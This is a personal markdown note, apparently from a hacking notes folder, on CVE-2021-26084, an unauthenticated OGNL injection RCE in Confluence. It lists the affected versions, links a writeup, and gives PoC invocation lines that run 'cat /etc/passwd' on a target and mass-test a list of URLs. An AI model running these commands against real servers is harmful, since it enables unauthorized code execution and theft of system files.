"/home/yossef/notes/personal/hacking/CVE/CVE-2021-26084_code_execute_confluence.md"

path: personal/hacking/CVE/CVE-2021-26084_code_execute_confluence.md

- **fileName**: CVE-2021-26084_code_execute_confluence
- **Created on**: 2025-12-13 15:17:38

In affected versions of Confluence Server and Data Center, an OGNL injection
vulnerability exists that would allow an unauthenticated attacker to execute
arbitrary code on a Confluence Server or Data Center instance. The affected
versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from
version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

github repo:
repo info

run the commend for execute using poc.py from repo

python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'

for testing list of urls from file

python PoC.py -f urls.txt

more details for how it's working

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

continue:./CVE-2025-24017_PHP_4.4.5_vuln_XSS.md
before:./CVE-2025-55182_react_server_component.md